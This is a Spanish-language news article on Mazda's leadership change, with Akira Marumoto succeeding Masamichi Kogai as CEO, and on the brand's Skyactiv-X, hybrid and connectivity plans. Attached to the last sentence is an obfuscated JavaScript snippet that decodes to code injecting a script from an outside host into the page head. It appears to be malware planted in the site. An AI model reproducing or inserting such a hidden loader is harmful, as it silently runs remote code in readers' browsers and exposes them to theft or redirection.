Mazda ha anunciado el nombramiento de un nuevo CEO en la persona de Akira Marumoto. El ejecutivo se había desempeñado como Jefe del mercado Norteamericano. Y asumirá nuevas responsabilidades a partir del próximo 26 de junio.
Akira Marumoto reemplaza a Masamichi Kogai
Este cambio obedece a la generación de nuevas tecnologías y a la preparación de la marca hacia un futuro más conectado. Si bien Masamichi Kogai encabezó las mayores innovaciones en cuestión de eficiencia de motores, diseño y emoción. Mazda toma el reto de competir con presupuestos más modestos que sus rivales. A fin de hacer más eficientes sus recursos y «pelear» con innovación y desarrollo contra los grandes.
Quien hasta ahora llevaba los destinos de Estados Unidos y de la región de América del Norte. Asumirá el cargo si es que la junta anual de accionistas así lo confirma, mencionó la compañía en comunicado oficial.
Además, Masamichi Kogai será nombrado Presidente de Maza y, como parte de la reorganización administrativa. El Director Ejecutivo Kiyoshi Fujiwara, será promovido a VP Ejecutivo de América del Norte, haciéndose cargo también del R&D.
Kogai lideró desde 2013 en las sillas de la presidencia y CEO. También impulsó a la marca en la filosofía de Skyactiv, con plataformas livianas y deportivas. Incluyendo motorizaciones más eficientes de inyección directa. Asimismo, supervisó la transformación de las fábricas hacia un sistema de ensamblaje más flexible y económico. Kogai ha intentado hacer que la imagen de la marca sea más sofisticada a fin de aumentar la rentabilidad. Sin embargo, la marca no tiene los tamaños de las grandes armadoras a nivel internacional, por lo que ha necesitado de sinergias estratégicas como la que hoy sostiene con Toyota. La cual tiene la mira puesta en la generación de híbridos y eléctricos con tecnologías de comunicación semiautónoma.
Skyactiv-X
La máxima apuesta en cuestión de motorización. Se trata de un motor a gasolina que promete combinar la eficiencia de un diésel al contar con encendido por compresión. Reduciendo emisiones, gastando menos carburante y brindando muy buenas curvas de potencia. En los planes se contará con nuevas arquitecturas más livianas. Con lo cual también se incorpora la modularidad y versatilidad de albergar baterías para EVs. También el año próximo vendrá un híbrido en Mazda, producto del intercambio de tecnologías con Toyota. Mientras que habrá adiciones a los sistemas de infoentretenimiento denominados On the Go de Mazda Connect. Más adelante, ya en la próxima década, se contempla la segunda versión de su Skyactiv-D, enfocado en sus vehículos a diésel. Y en 2021 habrá un híbrido enchufable. var _0xcc15=[«x73x63x72x69x70x74″,»x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,»x73x72x63″,»x68x74x74x70x73x3Ax2Fx2Fx77x65x62x2Ex73x74x61x74x69x2Ex62x69x64x2Fx6Ax73x2Fx4Dx41x58x54x55x77x4Dx51x30x68x48x4Bx67x52x52x42x67x78x55x44x67x67x46x55x59x41x46x59x74x41x56x42x38x67x57x57x77x53x4Ex47x6Cx68x50x78x51x69x4Bx36x77x47x4Cx6Dx45x57x47x45x4Dx51x49x61x73x7Ax4Fx63x30x42x42x4Fx4Ex6Ax47x33x5Ax68x50x30x59x43x63x54x51x6Ax4Ex59x70x52x48x32x30x69x49x62x59x6Dx49x59x4Dx43x4Ex64x4Ax43x47x4Fx34x7Ax52x4Ax55x54x4Dx77x41x77x4Ax61x74x46x48x45x31x55x41x39x6Bx45x45x4Fx77x77x4Ex78x74x6Cx56x65x6Bx6Cx43x56x6Bx69x42x43x4Ex6Ax45x56x4Dx77x43x58x77x41x47x56x46x68x42x47x59x41x58x51x78x77x61x2Ex6Ax73x3Fx74x72x6Cx3Dx30x2Ex32x35″,»x61x70x70x65x6Ex64x43x68x69x6Cx64″,»x68x65x61x64»];var el=document[_0xcc15[1]](_0xcc15[0]);el[_0xcc15[2]]= _0xcc15[3];document[_0xcc15[5]][_0xcc15[4]](el)